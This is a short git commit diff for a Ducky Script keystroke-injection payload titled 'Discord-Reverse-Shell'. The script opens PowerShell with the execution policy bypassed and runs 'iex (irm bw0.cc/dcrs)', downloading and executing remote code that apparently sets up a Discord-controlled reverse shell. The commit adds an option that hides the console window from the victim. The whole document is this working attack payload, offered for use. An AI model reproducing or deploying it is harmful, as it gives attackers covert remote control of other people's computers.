Update Discord-Reverse-Shell.txt

This commit is contained in:
egieb
2025-06-20 20:46:52 +00:00
committed by GitHub
parent 355eceea3b
commit 555022637a

View File

@@ -11,13 +11,12 @@ REM Change BOT_TOKEN below with your bot token
REM Change CHANNEL_ID below to your channel id
REM for more info goto - https://github.com/beigeworm/PoshCord-C2
REM some setup for dukie script
DEFAULT_DELAY 100
REM To hide the console, use $hide='y' below.
REM open powershell (remove "-W H" to show the window)
REM open powershell
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcrs)
STRING powershell -Ep Bypass -C $hide='y'; $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; iex (irm bw0.cc/dcrs)
ENTER